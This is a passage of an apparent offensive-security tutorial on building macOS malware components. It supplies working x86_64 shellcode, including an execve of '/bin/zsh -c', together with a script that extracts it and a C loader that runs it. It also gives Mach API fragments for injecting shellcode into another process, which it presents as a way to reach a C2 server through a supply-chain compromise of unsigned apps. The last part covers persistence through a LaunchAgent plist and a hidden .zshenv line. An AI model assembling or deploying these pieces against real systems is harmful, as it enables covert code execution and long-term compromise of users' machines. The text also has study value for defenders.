section .text

global _main
	_main:

start:
	jmp trick

continue:
	pop rsi            ; Pop string address into rsi
	mov rax, 0x2000004 ; System call write = 4
	mov rdi, 1         ; Write to standard out = 1
	mov rdx, 14        ; The size to write
	syscall            ; Invoke the kernel
	mov rax, 0x2000001 ; System call number for exit = 1
	mov rdi, 0         ; Exit success = 0
	syscall            ; Invoke the kernel
	
trick:
	call continue
	db "Hello World!", 0x0d, 0x0a ; 14 bytes, matching the 0x0d 0x0a at the end of the dump
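
The values 0x2000004 and 0x2000001 in trick.s are not arbitrary. On x86_64 macOS the syscall number carries a class in its top byte, and BSD calls such as write and exit belong to class 2. The sketch below shows the arithmetic. The constant names are modeled on XNU’s headers as I recall them, and the two helper functions are invented for this example.

```python
SYSCALL_CLASS_SHIFT = 24  # the class lives above the low 24 bits
SYSCALL_CLASS_UNIX = 2    # BSD/POSIX calls such as write, exit, execve

def bsd_syscall(number: int) -> int:
    """Combine the BSD class with a plain syscall number."""
    return (SYSCALL_CLASS_UNIX << SYSCALL_CLASS_SHIFT) | number

def split_syscall(value: int):
    """Return (class, number) for an encoded syscall value."""
    return value >> SYSCALL_CLASS_SHIFT, value & ((1 << SYSCALL_CLASS_SHIFT) - 1)

print(hex(bsd_syscall(4)))       # write -> 0x2000004
print(hex(bsd_syscall(1)))       # exit  -> 0x2000001
print(split_syscall(0x2000004))  # (2, 4)
```

Since 2 << 24 equals 1 << 25, setting bit 25 of a plain syscall number produces the same encoded value.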

Alright, time to compile. I usually use NASM to assemble my code. Remember the linker I mentioned? After assembling with NASM, we’ll link it with ld. The linker brings the assembled code together and adds the required system libraries.

Pretty slick, huh? Now, to make it usable for injection, we need to convert it into machine code, basically a hex string. These bytes are the exact instructions the processor will execute. For this, we use objdump.

~ > ./nasm -f macho64 trick.s -o trick.o && ld ./trick.o -o Hello -lSystem

~ > ./Hello
Hello World!

~ > objdump -d ./Hello | grep '[0-9a-f]:'| grep -v 'file'| cut -f2 -d:| cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '| sed 's/ $//g'| sed 's/ /\\x/g'| paste -d '' -s | sed 's/^/"/'| sed 's/$/"/g'

`\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a`
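
Before using a dump like this, it is worth sanity-checking it. The sketch below turns the escaped string back into bytes and checks three things: the total length, that the short jmp at the start lands on the call instruction, and that the trailing bytes are the message. The unescape helper and variable names are my own, and the offsets are specific to this particular dump.

```python
import re

DUMP = (r"\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01\x00\x00\x00\xba\x0e\x00"
        r"\x00\x00\x0f\x05\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00\x0f\x05"
        r"\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64"
        r"\x21\x0d\x0a")

def unescape(dump: str) -> bytes:
    """Convert a '\\xNN\\xNN...' string into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", dump))

payload = unescape(DUMP)

# A short jmp is 2 bytes (opcode 0xEB + rel8); the target is relative to its end.
jmp_target = 2 + payload[1]

# The write length is the 32-bit immediate of 'mov edx, imm32' (opcode 0xBA at offset 13).
write_len = int.from_bytes(payload[14:18], "little")

message = payload[-write_len:]

print(len(payload), hex(payload[jmp_target]), message)
```

Here the jmp lands on 0xe8 (the call), and the last 14 bytes decode to “Hello World!” followed by a carriage return and line feed, which matches the size loaded into rdx.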

If the objdump one-liner fails to extract the shellcode, just script it: a short Python script can parse the disassembly output. Easy fix.

od2shell.py

import sys
import re

def extract_shellcode(objdump_output):
    shellcode = ""
    length = 0
    lines = objdump_output.split('\n')
    
    for line in lines:
        if re.match("^[ ]*[0-9a-f]*:.*$", line):
            line = line.split(":")[1].lstrip()
            x = line.split("\t")
            opcode = re.findall("[0-9a-f][0-9a-f]", x[0])
            for i in opcode:
                shellcode += "\\x" + i
                length += 1

    return shellcode, length

def main():
    objdump_output = sys.stdin.read()
    shellcode, length = extract_shellcode(objdump_output)
    
    if shellcode == "":
        print("Bad")
    else:
        print("\n" + shellcode)

if __name__ == "__main__":
    main()

Does the shellcode work? To test, let’s inject it. One way is to store it in the executable’s __TEXT,__text section as a global var. Just declare it like this:

const char output[] __attribute__((section("__TEXT,__text"))) = "\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a";

Then use a function pointer to execute it:

typedef int (*funcPtr)();

int main(int argc, char **argv) {
    funcPtr ret = (funcPtr) output;
    (*ret)();
    return 0;
}

Simple and effective.

That was pretty simple, and since we’re already doing shellcode development, let’s write a proper shellcode that can actually be used offensively, or at least looks like it ;) How about opening a calculator? Or executing a shell, considering I’m running zsh.

On macOS, you’d use open -a calculator. However, I want to keep the shellcode flexible and capable of running different types of programs or commands, not just opening a calculator. For that, we need to use a syscall like execve to trigger the execution of something specific, such as /bin/zsh -c.

The execve syscall allows a process to execute the program specified by a pathname. In this case, we’ll be executing /bin/zsh -c, which means executing a shell command.

We then set up the syscall inputs to run a shell or potentially another executable. Once execve is invoked with them, we’re good to go.

To manage the code’s flow, we add a jump to the exec label, which will trigger the code that sets up the syscall. Afterward, the shellcode is set to execute the intended command.

exec.s

global _main

_main:
    xor rdx, rdx            ; Zero out the rdx register (NULL for string terminator)
    push rdx                ; Push NULL (0x0) onto the stack (string terminator)
    mov rbx, '/bin/zsh'     ; Load the path to the shell '/bin/zsh' into rbx
    push rbx                ; Push '/bin/zsh' onto the stack
    mov rdi, rsp            ; Set rdi to point to the start of the string "/bin/zsh"
    xor rax, rax            ; Clear rax to use it for setting up -c argument
    mov ax, 0x632D          ; Load the ASCII value of '-c' (0x632D) into rax
    push rax                ; Push the -c argument onto the stack
    mov rbx, rsp            ; Set rbx to point to the '-c' flag in memory (stack)
    push rdx                ; Push NULL onto the stack (0 as envp in execve)
    jmp short exec          ; Jump directly to the exec subroutine to execute the shell

exec:
    push rbx                ; Push "-c" argument onto stack (the flag)
    push rdi                ; Push '/bin/zsh' (the program) onto stack
    mov rsi, rsp            ; Set rsi to point to the stack (ARGV[])
    push 59                 ; Syscall number 59 (execve)
    pop rax                 ; Pop syscall number into rax
    bts rax, 25             ; Set bit 25 (0x2000000), the BSD syscall class, so rax = 0x200003B
    syscall                 ; Call the syscall (execve to spawn the shell)

dummy:
    call exec               ; If the exec fails (should not happen if valid exec), redirect flow here (hang forever)
    db 'open -a calculator', 0 ; Insert the string for opening calculator (useless in this case but fun to play with)
    push rdx                ; Push NULL (end of string)

This opens up countless possibilities, such as executing a payload or another application as seen above. Keep in mind that what we’ve just written is highly adaptable and can be obfuscated or modified to be stealthier, depending on the situation.

Alright, now that we’ve got ourselves a set of shellcode, it’s time to step up our game and write an actual process injector for macOS. This injector will serve as the vehicle to deliver our shellcode into a remote process, allowing us to establish communication with our C2 server and transmit host data to our server for further exploitation.

Old Application, Old Tricks

Remember the example we used earlier to showcase dylib injection? Yep, VeraCrypt. That will serve as the entry point our malware uses to execute its payload. So, what do I mean by that? Once the dummy malware infects the host, it looks for applications that may be vulnerable to injection, like older or unsigned ones. When such an application is identified, it serves as the entry point.

By exploiting this vulnerable application process, we’ll execute the payload that gathers a profile of the host and sends the data back to the C&C server, signaling that we’ve successfully infiltrated the system. First, though, we need to write an actual injector to showcase process injection. This depends heavily on elevated privileges. Why? Well, remember the mach_vm_protect and task_for_pid APIs? They are key to manipulating the memory of other processes, and this example involves them, so administrative privileges are a must.

But let’s tackle each problem one at a time. First things first, we need to write the injector.

The logic is simple: we take a single command-line argument, which is the PID (Process ID) of the target. From there, we get our hands on the target process using task_for_pid(). This call gives us the necessary task port to access the memory of the target process.

Once we’ve got the task port, the next step is to allocate memory within the target’s virtual address space. This is done using mach_vm_allocate(). Here, we allocate space for both a remote stack and our shellcode. After reserving the memory, we move on to writing the actual shellcode into the allocated space. Using mach_vm_write(), we place our shellcode into the reserved memory within the target process. This puts our injected code exactly where it needs to be in the remote process.

mach_vm_allocate(task, shellcode_addr, SHELLCODE_SIZE, VM_FLAGS_ANYWHERE);
mach_vm_write(task, *shellcode_addr, (vm_offset_t)shellcode, SHELLCODE_SIZE);
mach_vm_protect(task, *shellcode_addr, SHELLCODE_SIZE, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
mach_vm_allocate(task, stack_addr, STACK_SIZE, VM_FLAGS_ANYWHERE);

Now, things start to get a bit tricky with memory protection. Not all regions of memory are marked as executable. If we just wrote our shellcode into memory without modifying the permissions, the system wouldn’t let it run. So we use mach_vm_protect() to mark that region as readable and executable, which is what allows the injected code to run.

With the shellcode now in place and marked as executable, the next move is to tell the target process to actually execute it. We achieve this by creating a new thread in the target process using thread_create_running(). This is where we essentially redirect the target process’s execution flow to our shellcode, and the magic happens.

    x86_thread_state64_t state = {0};
    state.__rip = (uint64_t)shellcode_addr;
    state.__rsp = stack_addr + STACK_SIZE;

    thread_act_t thread;
    thread_create_running(task, x86_THREAD_STATE64, (thread_state_t)&state, x86_THREAD_STATE64_COUNT, &thread);
}

One more thing about this: after allocating the memory and writing the shellcode, we need to set the correct state for the remote thread to execute the code. Specifically, we need to set the instruction pointer (rip) to the address where our shellcode begins and the stack pointer (rsp) to point to the allocated remote stack.

Once we’ve set the state, we are ready to go. thread_create_running() both creates the thread and starts it, so no separate resume call is needed; the thread_act_t it returns is simply our handle to the new thread. As soon as the call succeeds, the thread begins executing the shellcode, which is the final trigger that activates our injected payload.

Now, here’s something to note about Mach threads. A POSIX thread comes with a pthread structure and thread-local storage (TLS) for managing thread-specific data. A raw Mach thread created with thread_create_running() has none of that set up. This becomes relevant when injecting shellcode into a target process.

POSIX threads are well-managed, and their execution context is tightly controlled. They can easily manage TLS and other vital information. In contrast, Mach threads are more bare-bones and come without TLS by default. This creates complications when we attempt to execute injected shellcode within the context of a Mach thread.

When we inject our shellcode and spawn a remote thread, we can’t simply point the thread’s instruction pointer (IP) at the shellcode and expect it to run without a hitch. That’s because the context of the Mach thread may not be suitable for executing our unmanaged shellcode in a stable environment. To ensure smooth execution, we need to promote the injected shellcode from running in a Mach thread to a proper POSIX thread context.

This means wrapping the shellcode execution in the environment that POSIX threads expect, making sure the thread’s context includes TLS and the other elements needed for stable operation. Once this promotion is in place and the remote thread is successfully running, the shellcode takes control, and we can proceed with our attack. We can establish connections to our C2 server or run any other payload, all thanks to the successful injection.

As I mentioned earlier, this isn’t about handing you malware but about teaching the fundamentals of programming in this case, with a focus on Mach ;).

The idea here is to achieve infection and execution through a supply chain compromise, targeting older app versions like VeraCrypt or similar unsigned applications. Many third-party macOS apps fail to implement proper hardening and, as a result, still honor DYLD_INSERT_LIBRARIES.

Let’s talk about persistence. After gaining initial access to a system, it’s crucial to establish persistence. We don’t want to rely solely on our initial access point, as it could be closed or disrupted for a variety of reasons. To ensure continued access, it’s important to have a reliable method in place for maintaining control over the target system.

For macOS, there are a variety of persistence techniques, but many require root privileges or exploit low-level vulnerabilities to escalate. To keep it simple, let’s focus on Userland Persistence. I’ll explain some common and lesser-known persistence techniques, so you get a sense of how these methods work and how malware can use them.

Before diving into these techniques, I reviewed several macOS malware samples and threat reports. A consistent trend is that LaunchAgents and LaunchDaemons are the most common methods used for persistence. These methods are popular because they are simple and flexible, similar to how startup folder persistence works on Windows. However, they are also easy to detect, and similar techniques like LOLBins (Living off the Land Binaries) are well-known and widely understood.

LaunchAgent & LaunchDaemon

LaunchAgents and LaunchDaemons are fundamental to macOS, responsible for managing processes that run automatically. LaunchAgents are typically found in the ~/Library/LaunchAgents directory and are triggered when a user logs in. On the other hand, LaunchDaemons are found in /Library/LaunchDaemons and run tasks when the system starts.

Although LaunchAgents typically operate within user sessions, they can also be found in system-wide directories such as /Library/LaunchAgents and /System/Library/LaunchAgents, but modifying anything under /System requires disabling System Integrity Protection (SIP). LaunchDaemons operate at the system level, so installing one in /Library/LaunchDaemons requires administrator privileges.

Both LaunchAgents and LaunchDaemons are configured using .plist files that define commands or executable files to run. LaunchAgents are useful for tasks that require user interaction, while LaunchDaemons are designed for background processes.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.pre.foo.plist</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Users/foo/dummy</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>

This file would ensure that the binary /Users/foo/dummy runs every time the user logs into the system. The launchd system handles it automatically.
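
To make the role of each key concrete, here is a small sketch that parses the same property list with Python’s standard plistlib module and pulls out the fields discussed above. The summarize_job helper is a name I made up for illustration. It only reads the plist and does not talk to launchd, so the same approach is handy when reviewing what is already installed on a machine.

```python
import plistlib

PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.pre.foo.plist</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Users/foo/dummy</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>"""

def summarize_job(raw: bytes) -> dict:
    """Extract the label, the executable, and the RunAtLoad flag from a job plist."""
    job = plistlib.loads(raw)
    args = job.get("ProgramArguments") or []
    # A job names its executable via Program or the first ProgramArguments entry.
    program = job.get("Program") or (args[0] if args else None)
    return {
        "label": job.get("Label"),
        "program": program,
        "run_at_load": bool(job.get("RunAtLoad", False)),
    }

print(summarize_job(PLIST))
```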

Now, I originally considered using emond, a built-in macOS command located at /sbin/emond, to establish persistence. Emond is an event monitoring daemon that processes events from various services and executes actions based on predefined rules. It is started by launchd during system boot and is typically configured in /System/Library/LaunchDaemons/com.apple.emond.plist.

However, after reviewing the tool and researching more recent updates to macOS, I realized that emond is quite outdated and won’t work on newer systems. It seems that this tool is no longer reliable for establishing persistence on modern macOS versions. Therefore, I decided to exclude it from this discussion.

For further reading on emond and its historical use, you can check out the original article from Xorrior here.

Bash Profiles & Zsh Startup

In macOS, just like Linux, there are startup scripts like bash profiles that run whenever a terminal is opened. However, macOS uses Zsh as the default shell, and it has a similar feature: startup files. Zsh also reads an extra environment file, .zshenv, on every invocation, which ensures that commands run consistently across different kinds of shell sessions. For example, you could use the following setup:

~ > cat .zshenv
. "/Users/foo/startup.sh" > /dev/null 2>&1&

This ensures that startup.sh runs every time a zsh instance starts, including each new terminal window, providing an additional layer of persistence.
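
As a rough guide to which per-user files zsh reads in each situation, the sketch below encodes the order described in the zsh documentation. The function name is hypothetical, and the system-wide /etc counterparts are left out for brevity.

```python
from typing import List

def zsh_startup_files(login: bool, interactive: bool) -> List[str]:
    """Return the per-user startup files zsh reads, in order."""
    files = [".zshenv"]            # read by every zsh invocation
    if login:
        files.append(".zprofile")  # login shells only
    if interactive:
        files.append(".zshrc")     # interactive shells only
    if login:
        files.append(".zlogin")    # login shells only, after .zshrc
    return files

print(zsh_startup_files(login=False, interactive=False))  # a script run with zsh
print(zsh_startup_files(login=True, interactive=True))    # a typical terminal window
```

Only .zshenv shows up in every case, which is why it is the file to check first when auditing a user’s shell configuration.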

There are multiple persistence methods available on macOS, including LaunchAgents, LaunchDaemons, and Zsh startup files. Each has its strengths and weaknesses, but the key takeaway is that persistence is important for maintaining access once initial entry has been achieved.

These days, with all the public scripts and post-exploitation frameworks available, attackers prefer to get the job done quickly without wasting time or effort. Writing malware is time-consuming, so they go after low-hanging fruit first. Once malware gets detected, it’s pretty much useless, which is why long-term operations require skill and planning: you can’t afford to have the malware burned early on. For something like a red team exercise, you’d test simpler methods and easy entry points before emulating more advanced threats.

A skilled attacker can often get past a security setup with just a simple MSFvenom shellcode. It often boils down to the simplest attacks. Normally, at this point, I’d talk about writing a simple malware, putting everything we’ve discussed into one complete piece of code. However, after some thought, adding more code here might just make things too complicated, so it’s better to save that for another article. Custom malware deserves its own deep dive. Next time, though.

Well, that’s it for now. We’ve laid a solid foundation, but there’s definitely more to explore. In the next part, we’ll dive deeper into advanced techniques like obfuscation, covert communication channels, and ways to ensure smooth operations.

If there’s anything we haven’t covered or if something feels unclear, feel free to reach out. We’ve touched on key concepts like code injection, persistence mechanisms, and how macOS syscalls work in practice through examples. But as always, there’s much more to uncover. Until next time.
